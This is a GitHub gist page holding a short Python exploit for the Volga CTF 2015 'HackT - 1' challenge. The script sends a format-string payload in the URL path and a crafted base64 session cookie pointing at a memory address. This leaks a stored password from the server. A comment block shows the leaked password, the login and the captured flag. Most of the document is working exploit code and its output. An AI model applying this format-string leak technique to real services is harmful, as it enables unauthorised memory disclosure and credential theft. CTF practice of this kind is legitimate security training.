Skip to content

Instantly share code, notes, and snippets.

@g05u g05u/hackt1_web.py
Created May 3, 2015

Embed
What would you like to do?
HackT1_xpl.py
#!/usr/bin/env python
import struct, sys, time, re
import requests, urllib
# Volga CTF 2015
# exploit HackT - 1
# www.null-life.com / @_g05u_
pass_addr = 0x606400 #password address in bss
QUERYS = 110
URL = 'http://notawebtask.2015.volgactf.ru:7777/NULL%s'
URL_AJAX = 'http://notawebtask.2015.volgactf.ru:7777/ajax_param'
s = requests.session()
fmt = urllib.quote_plus('%hhx' * 20 + '-%s')
d = ('B'*8 + struct.pack('<Q', pass_addr)).encode('base64').replace('\n', '')
print d
cookies = { 'session' : d}
r = s.get(URL % fmt, cookies = cookies)
r = s.get(URL_AJAX, cookies = cookies)
text = u''.join((r.text, )).encode('utf-8').strip()
print 'Password: %s' % text
'''
QkJCQkJCQkIAZGAAAAAAAA==
Password: Target page is not found: /NULL68fc4085e39b920f0f4e0303828001039042-H@ck_T_t3am_member_un1que_p@Ssword
User: HackT
Pass: H@ck_T_t3am_member_un1que_p@Ssword
Log in and get the flag: Flag{Stay Hungry. Stay Foolish.}
'''
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.